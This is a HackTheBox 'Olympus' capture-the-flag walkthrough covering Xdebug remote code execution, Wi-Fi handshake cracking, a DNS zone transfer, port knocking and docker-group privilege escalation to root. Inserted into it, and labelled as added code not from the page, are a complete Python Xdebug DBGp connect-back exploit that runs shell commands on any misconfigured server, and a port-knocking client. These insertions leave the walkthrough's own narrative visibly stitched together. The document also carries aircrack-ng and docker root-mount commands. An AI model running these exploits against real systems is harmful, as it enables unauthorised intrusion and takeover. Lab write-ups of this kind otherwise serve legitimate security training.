
Hackthebox Olympus Walkthrough

Initial Foothold – Crete Island

Nmap result:

Port 80 enumeration
– Dirbuster: no interesting page/directory.
– Nikto: found an uncommon response header exposing Xdebug 2.5.5.
– Xdebug is a PHP extension that assists with debugging and development.
– The header matters not because of the version but because of how Xdebug's remote debugging is commonly configured: with xdebug.remote_enable=1 and xdebug.remote_connect_back=1, any request carrying XDEBUG_SESSION_START makes PHP open a DBGp debugging session back to the address given in X-Forwarded-For (or the client IP), and DBGp's eval command runs arbitrary PHP, so an unauthenticated client gets OS command execution.
– Exploit: https://github.com/vulhub/vulhub/blob/master/php/xdebug-rce/exp.py

Running the exploit from the attacking machine's IP (10.10.14.x) does not return any result. Trying from another machine (rooted earlier) returns the result below:
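How the connect-back works end to end, as an added Python example (not the page's code and not vulhub's exp.py): it listens on the DBGp port, sends the trigger request with the listener's address in X-Forwarded-For, reads Xdebug's init packet and sends a single eval command. It assumes the target's php.ini has xdebug.remote_enable=1 and xdebug.remote_connect_back=1 (the page does not show the configuration), that the trigger path is /, and that the idekey value is arbitrary; the addresses in the main block are placeholders. A result only ever comes back if the target can open a TCP connection to the listener on port 9000, so that path is the first thing to check when the exploit returns nothing.

```python
import base64
import http.client
import socket
import threading
import xml.etree.ElementTree as ET

DBGP_PORT = 9000        # Xdebug 2.x default for xdebug.remote_port
IDEKEY = "phpstorm"     # assumption: any non-empty idekey starts a session


def build_eval_command(php_code: str, transaction_id: int = 1) -> bytes:
    """DBGp 'eval': the code goes base64-encoded after '--', and every
    command line is NUL-terminated."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return f"eval -i {transaction_id} -- {b64}\x00".encode()


def parse_dbgp_packet(buf: bytes):
    """Split one DBGp packet ('<length>\\0<xml>\\0') off the front of buf.
    Returns (xml_bytes, remainder); raises ValueError while incomplete."""
    head, sep, rest = buf.partition(b"\x00")
    if not sep or not head.isdigit():
        raise ValueError("length prefix not complete")
    n = int(head)
    if len(rest) < n + 1:
        raise ValueError("packet body not complete")
    if rest[n:n + 1] != b"\x00":
        raise ValueError("packet terminator missing")
    return rest[:n], rest[n + 1:]


def extract_eval_result(xml_bytes: bytes) -> str:
    """Take the value out of an eval <response>. Xdebug base64-encodes string
    properties and marks them with encoding="base64"."""
    root = ET.fromstring(xml_bytes)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "property":
            text = el.text or ""
            if el.get("encoding") == "base64":
                return base64.b64decode(text).decode(errors="replace")
            return text
    raise ValueError("no <property> element in response")


def send_trigger(target: str, listener_ip: str, path: str = "/") -> int:
    """Ask the target to start a debug session; with remote_connect_back the
    X-Forwarded-For value wins over the real peer address."""
    conn = http.client.HTTPConnection(target, timeout=10)
    conn.request("GET", f"{path}?XDEBUG_SESSION_START={IDEKEY}",
                 headers={"X-Forwarded-For": listener_ip})
    status = conn.getresponse().status
    conn.close()
    return status


def read_packet(conn: socket.socket, buf: bytes):
    """Keep receiving until one whole DBGp packet is buffered."""
    while True:
        try:
            return parse_dbgp_packet(buf)
        except ValueError:
            chunk = conn.recv(65536)
            if not chunk:
                raise ConnectionError("Xdebug closed the session")
            buf += chunk


def run_php_via_connect_back(php_code: str, target: str, listener_ip: str,
                             port: int = DBGP_PORT) -> str:
    """Listen, fire the trigger, accept the connect-back, swallow <init>,
    send one eval command and return its decoded result."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(15)
        # trigger from a thread so the listener is already up when PHP calls back
        threading.Thread(target=send_trigger, args=(target, listener_ip),
                         daemon=True).start()
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(15)
            _init, buf = read_packet(conn, b"")
            conn.sendall(build_eval_command(php_code))
            body, _ = read_packet(conn, buf)
            return extract_eval_result(body)


if __name__ == "__main__":
    # placeholders: the box, and an address it can reach on TCP 9000
    print(run_php_via_connect_back("shell_exec('id')", "10.10.10.83", "10.10.14.2"))
```

The eval command is the whole exploit: DBGp has no authentication beyond the idekey, and remote_connect_back lets the requester choose where the session goes. Fixing it is a php.ini matter (remote_connect_back off, remote_host pinned to the developer's machine, or Xdebug removed from production) rather than a version upgrade.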

Olympia – Enumeration (where is user.txt??)

Airgeddon, a wireless auditing tool (https://github.com/v1s1t0r1sh3r3/airgeddon), is installed, and there is a file "captured" in its directory. Copy the file out to enumerate it further.

Information obtained from the "captured.cap" file:
– A lot of deauthentication frames, most likely a deauthentication attack, which is one of airgeddon's features (it kicks clients off so they reconnect and the WPA handshake can be captured).
– SSID = Too_cl0se_to_th3_Sun -> looks like a hint, google it later.
– BSSID = f4:ec:38:ab:a8:a9
– AP vendor = TP-Link (from the BSSID's OUI prefix)

What next? Cracking the WPA handshake in the capture (aircrack-ng needs the 4-way handshake, which is what the deauthentication attack was meant to capture).
Why? The Wi-Fi password could be reused for SSH on port 2222 (from the nmap result).

# aircrack-ng -w /usr/share/wordlists/rockyou.txt -b f4:ec:38:ab:a8:a9 captured.cap


Wi-Fi password = flightoficarus
If this is the password for SSH (port 2222), what is the username? Enumerate more…

Google: too close to the sun


Rhodes – SSH attempt
– Username: icarus
– Password: flightoficarus

Rhodes – SSH attempt (revisit captured.cap file)

SSID name = Too_cl0se_to_th3_Sun -> looks like a password pattern. Let's try it.


Result: Welcome to Rhodes!! There is a hint file, "help_of_the_gods.txt". Did you notice the domain name? Now that we have a domain name, what can we do with it? Go back to the nmap result: remember TCP port 53? Enumerate that port.

Portal to the Hades
– DNS listens on both TCP and UDP port 53: ordinary lookups normally go over UDP, while zone transfers (AXFR) run over TCP, which is why TCP 53 showing up in the scan is worth a look.
– A zone transfer request needs two pieces of information:
1. Domain name – ctfolympus.htb
2. Server to ask (dig's @server argument) – 10.10.10.83


Result: another hint!!
1. prometheus: could be a username.
2. (3456 8234 62431): a port knocking sequence?
3. Again, something that looks like a password.

Portal to the Hades – Port knocking

Nmap result (before port knocking):

Nmap result (after port knocking) -> notice the difference?
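The knock itself, as an added Python example that is not part of the original walkthrough: one TCP connection attempt per port, in the order from the DNS hint, followed by a check of the port expected to open. It assumes a plain TCP knock (a knock daemon only needs to see the SYN, so refused or filtered connections are fine), that the knock is rate-insensitive enough for a short pause between ports, and that the port which appears afterwards is SSH on 22; the page only shows the before/after scans, so the check port is a placeholder.

```python
import socket
import time

KNOCK_SEQUENCE = [3456, 8234, 62431]    # from the DNS hint on this page
TARGET = "10.10.10.83"
CHECK_PORT = 22                         # assumption: the port the knock opens


def is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a TCP connect completes; refused and filtered both count as closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:
            return False


def knock(host: str, ports, delay: float = 0.3, timeout: float = 1.0):
    """Send one SYN per port, in order. The daemon watches for the SYN, so the
    connect being refused (RST) or timing out (filtered) does not matter.
    Returns the ports that were knocked, in order."""
    sent = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass
        sent.append(port)
        time.sleep(delay)    # keep the order unambiguous for the daemon
    return sent


def knock_and_check(host: str, sequence, check_port: int,
                    retries: int = 5, pause: float = 1.0) -> bool:
    """Knock, then poll the expected port; True once it answers."""
    knock(host, sequence)
    for _ in range(retries):
        if is_open(host, check_port):
            return True
        time.sleep(pause)
    return False


def local_selftest() -> bool:
    """Offline check of is_open(): a throwaway listener on 127.0.0.1 must read
    as open, and the same port must read as closed once it is torn down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    opened = is_open("127.0.0.1", port, timeout=0.5)
    srv.close()
    closed = not is_open("127.0.0.1", port, timeout=0.5)
    return opened and closed


if __name__ == "__main__":
    print("knocked:", knock(TARGET, KNOCK_SEQUENCE))
    print(f"{TARGET}:{CHECK_PORT} open after knock:",
          knock_and_check(TARGET, KNOCK_SEQUENCE, CHECK_PORT))
```

Two things bite in practice: a full nmap scan is itself a burst of SYNs to many ports and can break a sequence the daemon is in the middle of matching, so knock first and then scan; and the opened port usually closes again after a timeout, so connect to it straight away rather than after a leisurely rescan.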

Hades – Welcome to the Hades !! (user.txt)
Try:
1. username: prometheus
2. password: St34l_th3_F1re!

Olympus: Enumeration result
linuxprivchecker result: user prometheus is a member of the docker group, and the docker daemon runs as root. Membership of that group is effectively root, because anyone in it can start a privileged container with arbitrary host directories mounted inside it.

Google: docker privilege escalation returns plenty of results.

"If you happen to have gotten access to a user-account on a machine, and that user is a member of the 'docker' group, running the following command will give you a root shell" – https://fosterelli.co

Command: docker run --rm -it -v /root:/pwned olympia /bin/bash
--rm = remove the container when it exits
-i = interactive (keep stdin open)
-t = allocate a pseudo-TTY
-v = bind mount a host directory into the container; here the host's /root appears at /pwned, so root.txt can be read as the container's root user.
olympia is an image already present on the host; any local image with a shell would do. Mounting the whole host filesystem (-v /:/mnt) and running chroot /mnt inside the container gives a full root shell on the host rather than just access to /root.

[THE END]
